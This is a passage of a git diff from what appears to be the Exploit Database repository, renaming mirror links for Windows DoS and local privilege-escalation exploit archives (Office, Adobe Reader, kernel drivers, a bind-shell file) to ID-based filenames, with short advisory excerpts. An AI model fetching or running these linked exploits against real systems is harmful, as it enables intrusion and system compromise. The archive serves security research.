-25,6 +25,6 @@ http://www.zeroscience.org ------------------------------------------------------------------------------------------------------------------------------ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-vba32_poc.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6658.rar (2008-vba32_poc.rar) # milw0rm.com [2008-10-03] diff --git a/platforms/windows/dos/6732.txt b/platforms/windows/dos/6732.txt index e5fa2de56..10d2cbd5a 100755 --- a/platforms/windows/dos/6732.txt +++ b/platforms/windows/dos/6732.txt @@ -12,6 +12,6 @@ Causes Windows explorer and Internet explorer to crash. You can run arbitary code. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-emf_MS08-046.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6732.rar (2008-emf_MS08-046.rar) # milw0rm.com [2008-10-12] diff --git a/platforms/windows/dos/677.txt b/platforms/windows/dos/677.txt index 7fd07cd4c..2f9f8c5be 100755 --- a/platforms/windows/dos/677.txt +++ b/platforms/windows/dos/677.txt @@ -20,7 +20,7 @@ Solutions: There was no response. Exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/c_skin.grs +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/677.grs (c_skin.grs) When you copy or click this link, getright automaticly download and try to load crafted skin and will trigger buffer overflow diff --git a/platforms/windows/dos/6824.txt b/platforms/windows/dos/6824.txt index 20d9b6235..3ac8bfdcb 100755 --- a/platforms/windows/dos/6824.txt +++ b/platforms/windows/dos/6824.txt @@ -21,6 +21,6 @@ You need a slash on the stack prior to the input buffer. So play around a bit, you'll get it working reliably... poc: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-ms08-067.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6824.zip (2008-ms08-067.zip) # milw0rm.com [2008-10-23] diff --git a/platforms/windows/dos/7178.txt b/platforms/windows/dos/7178.txt index 4beca82ed..933d82d4c 100755 --- a/platforms/windows/dos/7178.txt +++ b/platforms/windows/dos/7178.txt @@ -19,6 +19,6 @@ ESI 04354E18 EDI 04352100 EIP 775781CB ntdll.775781CB -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-BitDefenderDOS.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7178.zip (2008-BitDefenderDOS.zip) # milw0rm.com [2008-11-20] diff --git a/platforms/windows/dos/770.txt b/platforms/windows/dos/770.txt index 912f4a953..84cbd6311 100755 --- a/platforms/windows/dos/770.txt +++ b/platforms/windows/dos/770.txt @@ -15,7 +15,7 @@ will can cause the remote system to crash. --Uncompleted qtif image file header http://www.atmacasoft.com/exp/vuln.qtif.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/vuln.qtif +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/770.qtif (vuln.qtif) 00000000 0000 005E 6964 7363 0000 0056 6A70 6567 0000 0000 0000 0000 0000 0000 ...^idsc...Vjpeg............ 0000001C 6170 706C 0000 0000 0000 0200 0100 016D 0048 0000 0048 0000 0000 724D appl...........m.H...H....rM diff --git a/platforms/windows/dos/8090.txt b/platforms/windows/dos/8090.txt index 55c92ad77..524534b56 100755 --- a/platforms/windows/dos/8090.txt +++ b/platforms/windows/dos/8090.txt @@ -1,5 +1,5 @@ causes an exception at 41414141 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-41414141.pdf +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8090.pdf (2009-41414141.pdf) # milw0rm.com [2009-02-23] diff --git a/platforms/windows/dos/8281.txt b/platforms/windows/dos/8281.txt index cf5459322..b1fda8566 100755 --- a/platforms/windows/dos/8281.txt +++ b/platforms/windows/dos/8281.txt @@ -4,6 +4,6 @@ Write up by redsand@blacksecurity.org : http://bl4cksecurity.blogspot.com/2009/0 Credits to mIKEJONES for providing the .EMF Crash down: http://www.blacksecurity.org/voltage-exploit.emf -back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-voltage-exploit.emf +back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8281.emf (2009-voltage-exploit.emf) # milw0rm.com [2009-03-24] diff --git a/platforms/windows/dos/8306.txt b/platforms/windows/dos/8306.txt index d6b6280ca..46f89c24e 100755 --- a/platforms/windows/dos/8306.txt +++ b/platforms/windows/dos/8306.txt @@ -1,5 +1,5 @@ Firefox memory corruption PoC/DoS in XUL (XML) parser -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-Firefox-XUL-0day-PoC.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8306.rar (2009-Firefox-XUL-0day-PoC.rar) # milw0rm.com [2009-03-30] diff --git a/platforms/windows/dos/8837.txt b/platforms/windows/dos/8837.txt index 0d6fd2937..9d6c2fcd9 100755 --- a/platforms/windows/dos/8837.txt +++ b/platforms/windows/dos/8837.txt @@ -56,7 +56,7 @@ ################################################################################ >>> *** PoC: http://www.zeroscience.org/codes/aimp2_evil.mp3 ~2.92 MB <<< ->>> *** PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-aimp2_evil.mp3 ~2.92 MB <<< +>>> *** PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8837.mp3 (2009-aimp2_evil.mp3) ~2.92 MB <<< ################################################################################ diff --git a/platforms/windows/dos/9167.txt b/platforms/windows/dos/9167.txt index 6c9c3bf6f..99094cac2 100755 --- a/platforms/windows/dos/9167.txt +++ b/platforms/windows/dos/9167.txt @@ -22,8 +22,8 @@ cccccccc ?? == -*** Proof Of Concept: http://zeroscience.org/codes/aimp2_evil.mp3 - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-aimp2_evil.mp3 +*** Proof Of Concept: http://zeroscience.org/codes/aimp2_evil.mp3 http://www.zeroscience.mk/old/codes/aimp2_evil.mp3 + https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9167.mp3 (2009-aimp2_evil.mp3) ** Note: The same PoC used in: - http://secunia.com/advisories/35305/ diff --git a/platforms/windows/dos/9169.txt b/platforms/windows/dos/9169.txt index f50bef53d..4670fa9c0 100755 --- a/platforms/windows/dos/9169.txt +++ b/platforms/windows/dos/9169.txt @@ -75,7 +75,7 @@ # # # - 1. http://zeroscience.org/codes/aimp2_evil.mp3 # # # - # - 2. https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-aimp2_evil.mp3 (mirror) # + # - 2. https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9167.mp3 (2009-aimp2_evil.mp3) (mirror) # # # # - 3. http://securityreason.com/download/11/13 (mirror) # # # diff --git a/platforms/windows/dos/9170.txt b/platforms/windows/dos/9170.txt index 454b68184..3afafc36c 100755 --- a/platforms/windows/dos/9170.txt +++ b/platforms/windows/dos/9170.txt @@ -44,7 +44,7 @@ http://www.zeroscience.org/ PoC: 1. http://zeroscience.org/codes/aimp2_evil.mp3 - 2. https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-aimp2_evil.mp3 + 2. https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9167.mp3 (2009-aimp2_evil.mp3) 3. http://securityreason.com/download/11/13 # milw0rm.com [2009-07-16] diff --git a/platforms/windows/dos/9417.txt b/platforms/windows/dos/9417.txt index e60e16c58..318ed3446 100755 --- a/platforms/windows/dos/9417.txt +++ b/platforms/windows/dos/9417.txt @@ -1,6 +1,6 @@ MS Windows 2003 (EOT File) BSOD Crash Exploit author: webDEViL -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-wwbsod.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9417.zip (2009-wwbsod.zip) # milw0rm.com [2009-08-11] diff --git a/platforms/windows/local/11199.txt b/platforms/windows/local/11199.txt index fc3204678..0a2b3bac9 100755 --- a/platforms/windows/local/11199.txt +++ b/platforms/windows/local/11199.txt @@ -1,4 +1,4 @@ -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/KiTrap0D.zip +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip (KiTrap0D.zip) Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack ------------------------------------------------------------------------- diff --git a/platforms/windows/local/14403.txt b/platforms/windows/local/14403.txt index daa0ba598..6b21c6fd0 100755 --- a/platforms/windows/local/14403.txt +++ b/platforms/windows/local/14403.txt @@ -5,7 +5,7 @@ From: http://www.ivanlef0u.tuxfamily.org/?p=411 3. Look at your logs. http://ivanlef0u.nibbles.fr/repo/suckme.rar -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/suckme.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14403.rar (suckme.rar) Tested under XP SP3. diff --git a/platforms/windows/local/14610.txt b/platforms/windows/local/14610.txt index 95ca1f4e4..11cc2306b 100755 --- a/platforms/windows/local/14610.txt +++ b/platforms/windows/local/14610.txt @@ -5,4 +5,4 @@ Microsoft Windows is prone to a local privilege-escalation vulnerability. An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will result in the complete compromise of affected computers. Code: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Chimichurri-CVE-2010-2554.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14610.zip (Chimichurri-CVE-2010-2554.zip) \ No newline at end of file diff --git a/platforms/windows/local/14748.txt b/platforms/windows/local/14748.txt index c9729242b..97b9a93a6 100755 --- a/platforms/windows/local/14748.txt +++ b/platforms/windows/local/14748.txt @@ -27,6 +27,6 @@ utorrent.exe directory, the payload will be executed with users' credentials. -rpcrtremote.dll -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Dr_IDE.bind.dll.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14748.tar.gz (Dr_IDE.bind.dll.tar.gz) #[pocoftheday.blogspot.com] \ No newline at end of file diff --git a/platforms/windows/local/14765.c b/platforms/windows/local/14765.c index 5c174ba0e..93bac51f5 100755 --- a/platforms/windows/local/14765.c +++ b/platforms/windows/local/14765.c @@ -26,4 +26,4 @@ int evil() return 0; } -// POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/mpc-poc.zip +// POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14765.zip (mpc-poc.zip) diff --git a/platforms/windows/local/14769.c b/platforms/windows/local/14769.c index e48ba8820..6ce0f7c4a 100755 --- a/platforms/windows/local/14769.c +++ b/platforms/windows/local/14769.c @@ -26,4 +26,4 @@ int evil() return 0; } -// POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/nvidia-poc.rar +// POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14769.rar (nvidia-poc.rar) diff --git a/platforms/windows/local/14944.py b/platforms/windows/local/14944.py index e7ed00827..c624ff757 100755 --- a/platforms/windows/local/14944.py +++ b/platforms/windows/local/14944.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/ - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-8-exploit.zip + https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14944.zip (moaub-8-exploit.zip) ''' ''' diff --git a/platforms/windows/local/14966.py b/platforms/windows/local/14966.py index 39c27ebda..4f80bc512 100755 --- a/platforms/windows/local/14966.py +++ b/platforms/windows/local/14966.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-10-excel-rtd-memory-corruption/ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-10-exploit.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14966.zip (moaub-10-exploit.zip) ''' ''' diff --git a/platforms/windows/local/14982.py b/platforms/windows/local/14982.py index 79e6c0fac..1fd79a351 100755 --- a/platforms/windows/local/14982.py +++ b/platforms/windows/local/14982.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub12-adobe-acrobat-and-reader-pushstring-memory-corruption/ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-12-exploit.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14982.zip (moaub-12-exploit.zip) ''' ''' diff --git a/platforms/windows/local/15094.py b/platforms/windows/local/15094.py index aff57e5ab..e4e5f9a15 100755 --- a/platforms/windows/local/15094.py +++ b/platforms/windows/local/15094.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-24-microsoft-excel-obj-record-stack-overflow/ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-24-excel-exploit.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15094.zip (moaub-24-excel-exploit.zip) ''' ''' diff --git a/platforms/windows/local/15609.txt b/platforms/windows/local/15609.txt index 6f858ecc6..c71ab4e88 100755 --- a/platforms/windows/local/15609.txt +++ b/platforms/windows/local/15609.txt @@ -3,7 +3,7 @@ A Design Flaw in Windows Kernel API can Lead to privilege escalation. Mirror of Original Post: http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/ PoC: http://www.codeproject.com/KB/vista-security/uac.aspx (not available) -mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/uacpoc.zip +mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15609.zip (uacpoc.zip) After running this PoC, just type “whoami” in command prompt to see the escalated user credentials. Points of Interest diff --git a/platforms/windows/local/15624.txt b/platforms/windows/local/15624.txt index 82dcba9e1..510e6592a 100755 --- a/platforms/windows/local/15624.txt +++ b/platforms/windows/local/15624.txt @@ -79,4 +79,4 @@ and force execution with kernel priviligies(cpl==0). Exploit code is in CAInternetSecuritySuite2010.zip file. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CAInternetSecuritySuite2010.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15624.zip (CAInternetSecuritySuite2010.zip) \ No newline at end of file diff --git a/platforms/windows/local/15696.txt b/platforms/windows/local/15696.txt index c45f078fd..ac6eb14a3 100755 --- a/platforms/windows/local/15696.txt +++ b/platforms/windows/local/15696.txt @@ -58,5 +58,5 @@ FhUAn0y6pBrAJXLcLiEfINR5hT4MfL52 =zMAG -----END PGP SIGNATURE----- -Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Off_with_her_head.a2w +Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15696.a2w (Off_with_her_head.a2w) diff --git a/platforms/windows/local/16024.txt b/platforms/windows/local/16024.txt index 68e004a2c..787c9dc21 100755 --- a/platforms/windows/local/16024.txt +++ b/platforms/windows/local/16024.txt @@ -76,7 +76,7 @@ considered valid. DoS: http://aluigi.org/poc/fxscover_1.cov -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/16024_fxscover_1.cov +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/16024-fxscover_1.cov Bind Shell: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/fxscover_1_bind28876.zip diff --git a/platforms/windows/local/17473.txt b/platforms/windows/local/17473.txt index bffb7c763..eb9199cfb 100755 --- a/platforms/windows/local/17473.txt +++ b/platforms/windows/local/17473.txt @@ -16,5 +16,5 @@ # also check here for The Persian docs of this methods and more : http://www.0days.ir/article/ -Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cve-2011-0611_exploit.pdf +Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17473.pdf (cve-2011-0611_exploit.pdf) diff --git a/platforms/windows/local/17474.txt b/platforms/windows/local/17474.txt index b4915e65e..da19316a4 100755 --- a/platforms/windows/local/17474.txt +++ b/platforms/windows/local/17474.txt @@ -149,4 +149,4 @@ stores in stack :D -Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cve-2011-3333_exploit.doc +Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17474.doc (cve-2011-3333_exploit.doc) diff --git a/platforms/windows/local/17488.txt b/platforms/windows/local/17488.txt index 287e33cfd..3774052ee 100755 --- a/platforms/windows/local/17488.txt +++ b/platforms/windows/local/17488.txt @@ -17,4 +17,4 @@ -Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cve-2004-0194.xfdf.xfdf \ No newline at end of file +Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17488.xfdf (cve-2004-0194.xfdf.xfdf) \ No newline at end of file diff --git a/platforms/windows/local/3260.txt b/platforms/windows/local/3260.txt index 786c47fc0..6809ebbb2 100755 --- a/platforms/windows/local/3260.txt +++ b/platforms/windows/local/3260.txt @@ -24,7 +24,7 @@ + Reference : http://www.microsoft.com/technet/security/advisory/932114.mspx - Microsoft Security Advisory (932114) -- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/02032007-word2000exp.doc +- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3260.doc (02032007-word2000exp.doc) - http://www.returnaddr.org/exploit/word2000 ############ use at your own risk ******* diff --git a/platforms/windows/local/34648.txt b/platforms/windows/local/34648.txt index 34299f273..b5e13ff23 100755 --- a/platforms/windows/local/34648.txt +++ b/platforms/windows/local/34648.txt @@ -1,4 +1,4 @@ Exploit: http://www.joxeankoret.com/download/comodo_sandbox_escape/sandbox_test1.tar.gz -Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/sandbox_test1.tar.gz +Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34648.tar.gz (sandbox_test1.tar.gz) Video: http://www.joxeankoret.com/download/comodo_sandbox_escape/video/sandbox_escape1.htm \ No newline at end of file diff --git a/platforms/windows/local/3664.txt b/platforms/windows/local/3664.txt index a6b7e50bc..f9d91909c 100755 --- a/platforms/windows/local/3664.txt +++ b/platforms/windows/local/3664.txt @@ -16,6 +16,6 @@ # (/var/spool/atjobs/), xinetd (/etc/xinetd.d), /etc/logrotate.d, and more... http://www.0xdeadbeef.info/exploits/raptor_truecrypt.tgz -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04042007-raptor_truecrypt.tgz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3664.tgz # milw0rm.com [2007-04-04] diff --git a/platforms/windows/local/4178.txt b/platforms/windows/local/4178.txt index 1170812fd..6d3fed824 100755 --- a/platforms/windows/local/4178.txt +++ b/platforms/windows/local/4178.txt @@ -3,6 +3,6 @@ Symantec AntiVirus symtdi.sys Local Privilege Escalation Author: Zohiartze Herce Site: http://48bits.com -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/07122007-symTDI_advisory.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4178.rar (07122007-symTDI_advisory.rar) # milw0rm.com [2007-07-12] diff --git a/platforms/windows/local/4625.txt b/platforms/windows/local/4625.txt index c374af330..9bcc206dd 100755 --- a/platforms/windows/local/4625.txt +++ b/platforms/windows/local/4625.txt @@ -26,7 +26,7 @@ do not use the exploit for attacking. The attached file is at: http://ruder.cdut.net/attach/MS_MDB_Vul/Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar - backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11162007-Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar + backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4625.rar (11162007-Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar) MD5 Hash:73243B8823C8DC2C88AE0529CA13C4C6 diff --git a/platforms/windows/local/5287.txt b/platforms/windows/local/5287.txt index 179ec4c75..c32bd17ec 100755 --- a/platforms/windows/local/5287.txt +++ b/platforms/windows/local/5287.txt @@ -1,5 +1,5 @@ Microsoft Office Excel Code Execution Exploit (MS08-014) -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-zha0_ms08_014.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5287.rar (2008-zha0_ms08_014.rar) # milw0rm.com [2008-03-21] diff --git a/platforms/windows/local/5320.txt b/platforms/windows/local/5320.txt index 7a12bd784..1eed21edd 100755 --- a/platforms/windows/local/5320.txt +++ b/platforms/windows/local/5320.txt @@ -2,7 +2,7 @@ Runs calc.exe on Office XP SP3 with updates < 03/11/08. Just for fun... -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-ms08-016.tgz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5320.tgz (2008-ms08-016.tgz) Marsupilamipowa@hotmail.fr diff --git a/platforms/windows/local/5442.cpp b/platforms/windows/local/5442.cpp index 2de7e27c1..cc2ea466a 100755 --- a/platforms/windows/local/5442.cpp +++ b/platforms/windows/local/5442.cpp @@ -10,6 +10,6 @@ /// calc will not be run. ///////////////////////////////////////////////////////////// -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-exploit_08021.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5442.zip (2008-exploit_08021.zip) // milw0rm.com [2008-04-14] diff --git a/platforms/windows/local/5518.txt b/platforms/windows/local/5518.txt index b55a31d69..7f7eca1ff 100755 --- a/platforms/windows/local/5518.txt +++ b/platforms/windows/local/5518.txt @@ -9,6 +9,6 @@ // Ruben Santamarta // www.reversemode.com -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-ms08-25-exploit.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5518.zip (2008-ms08-25-exploit.zip) # milw0rm.com [2008-04-28] diff --git a/platforms/windows/local/6705.txt b/platforms/windows/local/6705.txt index ec1c085b5..d953dbda7 100755 --- a/platforms/windows/local/6705.txt +++ b/platforms/windows/local/6705.txt @@ -29,7 +29,7 @@ Response.Write(output); You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip -backup link: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-Churrasco.zip +backup link: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6705.zip (2008-Churrasco.zip) Enjoy. diff --git a/platforms/windows/local/6757.txt b/platforms/windows/local/6757.txt index 0570031ce..3b99ba8d9 100755 --- a/platforms/windows/local/6757.txt +++ b/platforms/windows/local/6757.txt @@ -4,7 +4,7 @@ I have just uploaded a k-plugin for Kartoffel, which exploits a flaw patched in the recent MS08-066 bulletin. http://kartoffel.reversemode.com/downloads.php -backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-afd_plugin.zip +backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6757.zip (2008-afd_plugin.zip) For those researchers interesting in digging a little bit more into this diff --git a/platforms/windows/local/6994.txt b/platforms/windows/local/6994.txt index 63639e6f7..3517a67e9 100755 --- a/platforms/windows/local/6994.txt +++ b/platforms/windows/local/6994.txt @@ -1,6 +1,6 @@ Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Exploit author: Elazar -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-APSB08-19.pdf +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6994.pdf (2008-APSB08-19.pdf) # milw0rm.com [2008-11-05] diff --git a/platforms/windows/local/7054.txt b/platforms/windows/local/7054.txt index 808490d41..957c5cfd5 100755 --- a/platforms/windows/local/7054.txt +++ b/platforms/windows/local/7054.txt @@ -27,7 +27,7 @@ Exploit: http://www.ntinternals.org/ntiadv0802/AKEProtect_Exp.zip -backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-AKEProtect_Exp.zip +backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7054.zip (2008-AKEProtect_Exp.zip) Advisory: http://www.ntinternals.org/ntiadv0802/ntiadv0802.html diff --git a/platforms/windows/local/7516.txt b/platforms/windows/local/7516.txt index e9b6d9cb7..f8b8e13ac 100755 --- a/platforms/windows/local/7516.txt +++ b/platforms/windows/local/7516.txt @@ -27,7 +27,7 @@ Exploit: http://www.ntinternals.org/ntiadv0807/Epfw_Exp.zip -backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-Epfw_Exp.zip +backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7516.zip (2008-Epfw_Exp.zip) Advisory: http://www.ntinternals.org/ntiadv0807/ntiadv0807.html diff --git a/platforms/windows/local/7533.txt b/platforms/windows/local/7533.txt index cafa3a443..fc6f43366 100755 --- a/platforms/windows/local/7533.txt +++ b/platforms/windows/local/7533.txt @@ -27,7 +27,7 @@ Exploit: http://www.ntinternals.org/ntiadv0810/PowerStrip_Exp.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-PowerStrip_Exp.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7533.zip (2008-PowerStrip_Exp.zip) Advisory: http://www.ntinternals.org/ntiadv0810/ntiadv0810.html diff --git a/platforms/windows/local/8175.txt b/platforms/windows/local/8175.txt index 19958bdb6..4d2399e36 100755 --- a/platforms/windows/local/8175.txt +++ b/platforms/windows/local/8175.txt @@ -30,7 +30,7 @@ Exploit: http://ntinternals.org/ntiadv0809/MksMonEn_Exp.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-MksMonEn_Exp.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8175.zip (2009-MksMonEn_Exp.zip) Advisory: diff --git a/platforms/windows/local/8250.txt b/platforms/windows/local/8250.txt index bc2d1ceeb..d6f743582 100755 --- a/platforms/windows/local/8250.txt +++ b/platforms/windows/local/8250.txt @@ -33,7 +33,7 @@ Exploit: http://ntinternals.org/ntiadv0812/ElbyCDIO_Exp.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-ElbyCDIO_Exp.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8250.zip (2009-ElbyCDIO_Exp.zip) Advisory: http://ntinternals.org/ntiadv0812/ntiadv0812.html diff --git a/platforms/windows/local/8280.txt b/platforms/windows/local/8280.txt index 33f8ba21d..3a962e81a 100755 --- a/platforms/windows/local/8280.txt +++ b/platforms/windows/local/8280.txt @@ -3,6 +3,6 @@ Adobe Acrobat Reader JBIG2 Universal Exploit Bind Shell port 5500 write up: http://bl4cksecurity.blogspot.com/2009/03/adobe-acrobatreader-universal-exploit.html down: http://blacksecurity.org/download/66/Adobe_JBIG2_Universal_Reader_Acrobat_Exploit -back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-bl4ck-adobe.zip +back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8280.zip (2009-bl4ck-adobe.zip) # milw0rm.com [2009-03-24] diff --git a/platforms/windows/local/8322.txt b/platforms/windows/local/8322.txt index d476ad19e..1579ecf3f 100755 --- a/platforms/windows/local/8322.txt +++ b/platforms/windows/local/8322.txt @@ -5,6 +5,6 @@ The vulnerability is caused due to the IOCTL handler of the "tmactmon.sys" driver improperly processing user space parameters. This exploit execute arbitrary code in kernel space via a specially crafted IOCTL. -untested: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-trendmicro_local_expl_0day.zip +untested: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8322.zip 2009-trendmicro_local_expl_0day.zip) # milw0rm.com [2009-03-30] diff --git a/platforms/windows/local/8595.txt b/platforms/windows/local/8595.txt index 6bb8adc01..2f5ba9933 100755 --- a/platforms/windows/local/8595.txt +++ b/platforms/windows/local/8595.txt @@ -21,6 +21,6 @@ Exploit By : www.Abysssec.com note : this exploit is just for educational purpose so shellcode will execute calc if you want other shellcode change shellcode . Exploit Link : http://abysssec.com/Adobe.Collab.getIcon().pdf -Mirror Link : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-Adobe.Collab.getIcon.pdf +Mirror Link : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8595.pdf (2009-Adobe.Collab.getIcon.pdf) # milw0rm.com [2009-05-04] diff --git a/platforms/windows/local/8782.txt b/platforms/windows/local/8782.txt index 7cf00cb77..573fbed57 100755 --- a/platforms/windows/local/8782.txt +++ b/platforms/windows/local/8782.txt @@ -35,7 +35,7 @@ Exploit: http://ntinternals.org/ntiadv0814/PsDrv_Exp.zip Mirror: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-PsDrv_Exp.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8782.zip (2009-PsDrv_Exp.zip) Advisory: http://ntinternals.org/ntiadv0814/ntiadv0814.html diff --git a/platforms/windows/local/8799.txt b/platforms/windows/local/8799.txt index 7d160ddf6..9ab10194d 100755 --- a/platforms/windows/local/8799.txt +++ b/platforms/windows/local/8799.txt @@ -28,7 +28,7 @@ php implement "\" character can escape safemode using function like excec . PoC / Exploit : orginal : www.abysssec.com/safemod-windows.zip -mirror : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-safemod-windows.zip +mirror : 